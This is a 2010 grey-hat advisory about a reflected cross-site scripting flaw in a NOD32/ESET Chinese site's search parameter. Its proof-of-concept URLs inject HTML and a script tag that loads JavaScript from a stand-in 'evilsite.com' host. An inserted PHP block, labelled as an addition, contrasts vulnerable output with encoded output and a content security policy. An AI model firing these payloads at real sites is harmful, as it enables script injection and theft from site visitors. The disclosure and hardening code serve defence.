[whitepaper] NOD32 (CN) Cross Site Scripting Vulnerability

.___________  ________  http://www.nod32.com.cn
____   ____   __| _/\_____  \ \_____  \    ____   ____
/    \ /  _ \ / __ |   _(__  <  /  ____/   _/ ___\ /    \
|   |  (  <_> ) /_/ |  /       \/       \   \  \___|   |  \
|___|  /\____/\____ | /______  /\_______ \ / \___  >___|  /
\/            \/        \/         \/ \/   \/     \/
> Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com
> Vulnerability: Cross Site Scripting

————————-
1. INFORMATION          |
————————-
Site: http://www.nod32.com.cn
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————-
2. DESCRIPTION          |
————————-

http://www.nod32.com.cn suffers from a remote cross site scripting vulnerability, which can be used to
scam users out of information and to execute malicious JavaScript, which might remotely download a
file to the victim's PC.

————————-
3. PROOF OF CONCEPT     |
————————-
Display a message using HTML:
http://www.eset.com.cn/default.php?id=181&p=24&searchword=%3Ch1%3EXSS+-+Sora%3C%2Fh1%3E%3E%22%3Ctitle%3E%3Cmarquee%3EXSS%20by%20Sora%20-%20IMPROVE%20YOUR%20SECURITY%20-%20greyhathackers.wordpress.com&btnG=

Execute malicious code:
http://www.eset.com.cn/default.php?id=181&p=24&searchword=<script src="http://www.evilsite.com/foo.js"><h2>Error</h2>&btnG=
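
The fix for the behaviour shown above, as an added example that is not from the original post or the site's own code: the same searchword values rendered without and with output encoding. It assumes the page is PHP (the URL is default.php) and that searchword is echoed into the HTML body; the function names and markup are hypothetical.

```php
<?php
// Added example. Function names and page markup are assumptions, not the site's code.

// Vulnerable pattern: the search term is written into the page unchanged,
// so any tag in the parameter becomes part of the document.
function render_results_vulnerable(string $searchword): string
{
    return '<p>Results for: ' . $searchword . '</p>';
}

// Hardened pattern: encode for the HTML context at output time.
// ENT_QUOTES also encodes ' and ", which keeps the value inert inside attributes.
function render_results_hardened(string $searchword): string
{
    $safe = htmlspecialchars($searchword, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p>Results for: ' . $safe . '</p>';
}

// Defence in depth: response headers that refuse inline and third-party scripts.
// In a web request each string would be passed to header() before any output.
function security_headers(): array
{
    return [
        "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'",
        'X-Content-Type-Options: nosniff',
    ];
}

// True when a tag taken from the request survives as live markup in the response.
function has_injected_markup(string $html): bool
{
    return stripos($html, '<script') !== false
        || stripos($html, '<h1') !== false
        || stripos($html, '<h2') !== false;
}

// searchword values taken from the proof of concept above
// (the first is the leading part of the URL-encoded one, decoded).
$samples = [
    urldecode('%3Ch1%3EXSS+-+Sora%3C%2Fh1%3E'),
    '<script src="http://www.evilsite.com/foo.js"><h2>Error</h2>',
];

foreach ($samples as $value) {
    $bad  = render_results_vulnerable($value);
    $good = render_results_hardened($value);
    printf("vulnerable: injected markup = %s\n", has_injected_markup($bad) ? 'yes' : 'no');
    printf("hardened:   injected markup = %s\n", has_injected_markup($good) ? 'yes' : 'no');
    printf("hardened output: %s\n\n", $good);
}
```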

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – https://greyhathackers.wordpress.com – Sora
